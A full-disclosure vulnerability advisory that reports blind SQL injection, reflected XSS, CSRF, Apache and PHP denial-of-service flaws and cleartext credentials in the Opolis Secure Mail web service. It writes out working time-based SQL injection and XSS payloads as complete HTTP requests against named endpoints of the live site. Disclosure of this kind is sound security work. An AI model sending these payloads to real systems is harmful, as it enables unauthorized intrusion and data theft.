========================================================================================================================================================================= OPOLIS.EU SECURE MAIL Blind SQLInjection / Cross site scripting / CSRF / Apacche httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/User credentials are sent in clear text ========================================================================================================================================================================== TIME-LINE VULNERABILITY Multiples Advisories Opolis Secure IT-Services GmbH Address:Romberggasse 3 1230 Vienna Austria E-Mail Contact: helpdesk@opolis.eu BUT Not Response THEN Full Disclosure I. VULNERABILITY ------------------------- #Title: OPOLIS.EU SECURE MAIL BLIND SQLInjection / Cross site scripting /Cross Site Request Forgery/ Apache httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/ Credentials are sent in clear text #Vendor:http://www.opolis.eu/ #Author:Juan Carlos García (@secnight) #Follow me Twitter:@secnight II. DESCRIPTION ------------------------- Opolis Secure Mail is dedicated to provide the most user-friendly high-security E-Mail and document messaging service. Opolis re-defines E-Mail with its “Power to the Sender” philosophy: The sender decides if or how E-Mails may be further processed and the sender monitors the processing and forwarding flow of messages. Opolis also offers co-branded solutions for internet and E-Mail communication as well as document messaging. Opolis Secure Mail is owned by privately-held PI Technology Co WLL. III. PROOF OF CONCEPT ------------------------- Blind SQL Injection ******************** Vulnerability description ------------------------- SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable. Affected items ---------------- /createOpolisWorkGroup/createOpolisWorkGroupStep5.php URL encoded POST input checkedemail was set to 1';select pg_sleep(2); -- POST /createOpolisWorkGroup/createOpolisWorkGroupStep5.php aiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=NIL&aifirstname=myufyvmc&ailanguage=English&ailastname=myufyvmc&aititle=Mr.&aizip=94102&checkedemail=1%27%3bselect %20pg_sleep%282%29%3b%20--%20&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=myufyvmc /slimstat/stats_js.php "ttl" URL encoded GET input "ttl" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK (2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR"*/ GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version %2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*% GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version %2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*% "url" URL encoded GET input "url" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK (2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR"*/ GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR %28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR %28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f Cross site scripting ( 67 ) ********************* Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. Affected items ---------------- /createOpolisWorkGroup/createOpolisWorkGroupStep1.php (2) URL encoded POST input OSMLogInNam was set to hkmohkhr_974672"():;934304 POST /createOpolisWorkGroup/createOpolisWorkGroupStep1.php checkloginname=&OSMLogInNam=hkmohkhr_974672%22%28%29%3a%3b934304 /createOpolisWorkGroup/createOpolisWorkGroupStep2.php (2) URL encoded POST input currentEmail was set to sample%40email.tst_940309"():;974560 POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php currentEmail=sample%2540email.tst_940309%22%28%29%3a%3b974560&showcheckedloginname=rgrdtkbl /OpolisSignUp/OpolisSignUpStep1a.php (2) URL encoded POST input OSMLogInNam was set to etomstqd_911786"():;974637 POST /OpolisSignUp/OpolisSignUpStep1a.php checkloginname=&OSMLogInNam=etomstqd_911786%22%28%29%3a%3b974637 /OpolisSignUp/OpolisSignUpStep2a.php URL encoded POST input currentEmail was set to sample%40email.tst_928249"():;986211 The input is reflected inside aiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=Antarctica%27%22%28%29%26%25%3cScRiPt%20%3eprompt%28973546%29%3c%2fScRiPt %3e&aifirstname=kmaqpmwp&ailanguage=English&ailastname=kmaqpmwp&aititle=Mr.&aizip=94102&checkedemail=&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=kmaqpmwp /OpolisSignUp/OpolisSignUpStep2a.php. (3) URL encoded POST input checkedloginname was set to 1" onmouseover=prompt(994853) bad=" checkedloginname=1%22%20onmouseover%3dprompt%28994853%29%20bad%3d%22&showEmailfield= /OpolisSignUp/OpolisSignUpStep3a.php. (5) URL encoded POST input checkedemail was set to 1" onmouseover=prompt(935016) bad=" checkedemail=1%22%20onmouseover%3dprompt%28935016%29%20bad%3d%22&checkedloginname=&showverifyEmailfield= Cross Site Request Forgery CSRF (12) ******************************* Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Affected items --------------- /createOpolisWorkGroup/createOpolisWorkGroupStep1.php /createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0) /createOpolisWorkGroup/createOpolisWorkGroupStep3.php /createOpolisWorkGroup/createOpolisWorkGroupStep4.php (32e4ce87958c47459e9174f94651b76d) /OpolisSignUp/OpolisSignUpStep1a.php /OpolisSignUp/OpolisSignUpStep2a.php (f3d86faf83a15fd403feae569c201ee0) /OpolisSignUp/OpolisSignUpStep3a.php /slimstat (9200b13decfada22b75676834e865e65) The impact of this vulnerability --------------------------------- An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application. Two examples ( too much security flaws .. ) /createOpolisWorkGroup/createOpolisWorkGroupStep1.php. (2) Attack details ---------------- Form name: OSMSignUp Form action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep1.php Form method: POST Form inputs: checkloginname [Hidden] OSMLogInNam [Text] /createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0). Attack details ----------------- Form name: OSMSignUp Form action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep2.php Form method: POST Form inputs: showcheckedloginname [Text] currentEmail [Text] POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php checkedloginname=&showEmailfield= Apache httpd Remote D.O.S (2) ************************** Vulnerability description ------------------------------- A denial of service vulnerability has been found in the way the multiple overlapping ranges are handled by the Apache HTTPD server: http://seclists.org/fulldisclosure/2011/Aug/175 An attack tool is circulating in the wild. Active use of this tools has been observed. The attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server. Affected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19). How to fix this vulnerability ---------------------------- Upgrade to the latest version of Apache HTTP Server (2.2.20 or later), available from the Apache HTTP Server Project Web site. Web references -------------- CVE-2011-3192 Apache HTTPD Security ADVISORY Apache HTTP Server 2.2.20 Released Apache httpd Remote Denial of Service (memory exhaustion) Apache httpOnly cookie disclosure ********************************** Vulnerability description ---------------------------- Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script. Affected Apache versions (up to 2.0.21). The impact of this vulnerability ------------------------------- Information disclosure. How to fix this vulnerability ------------------------------ Upgrade Apache 2.x to the latest version. Apache 2.2.22 is the first version that fixed this issue. Web references --------------- Fixed in Apache httpd 2.2.22 Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability PHP hangs on parsing particular strings as floating point number (2) ***************************************************************** PHP hangs when parsing '2.2250738585072011e-308' string as a floating point number. Current version is : PHP/5.3.1 Affected PHP versions: 5.3 up to version 5.3.5 and 5.2 up to version 5.2.17 Affected items --------------- Web Server The impact of this vulnerability ---------------------------------- Denial of service attack How to fix this vulnerability ------------------------------- Upgrade PHP to the latest version. Web references ----------------- PHP Hangs On Numeric Value 2.2250738585072011e-308 PHP Homepage User credentials are sent in clear text ***************************************** Vulnerability description --------------------------- User credentials are transmitted over an unencrypted channel. This information should always be transferred via an encrypted channel (HTTPS) to avoid being intercepted by malicious users. Affected items -------------- /slimstat (9200b13decfada22b75676834e865e65) The impact of this vulnerability ---------------------------------- A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection. How to fix this vulnerability ------------------------------- Because user credentials are considered sensitive information, should always be transferred to the server over an encrypted connection (HTTPS). IV. BUSINESS IMPACT ------------------------- ( No Comments... ) V SOLUTION ------------------------ Very easy and I don´t understand... WRITE SECURE CODE P L E A S E !! VI. CREDITS ------------------------- This vulnerability has been discovered by Juan Carlos García(@secnight) VII. LEGAL NOTICES ------------------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information.